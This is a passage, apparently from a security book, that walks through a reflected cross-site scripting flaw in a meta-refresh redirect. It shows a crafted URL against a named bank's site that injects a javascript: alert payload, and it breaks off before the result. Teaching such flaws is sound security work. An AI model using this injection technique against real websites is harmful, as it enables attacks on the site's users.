
good news is that there is no input validation, and we can observe that our code
was interpreted, and the meta-refresh HTML demonstrates that clearly.That
means there are two trivial ways to get our code evaluated by the server:
■
Find a registered protocol that executes code.
■
Close the meta-refresh tag code and initiate our code.
The first technique can be limited, but we can definitely show that we can
successfully execute our cross-site scripting test, like so (see Figure 4.29):
[Our Poisoned URL]
http://www.personal.barclays.co.uk/BRC1/jsp/brcucontrol?site=pfs&task=intern
al&value=javascript:alert('vulnerable?');&target=_self
[Meta-Refresh Result]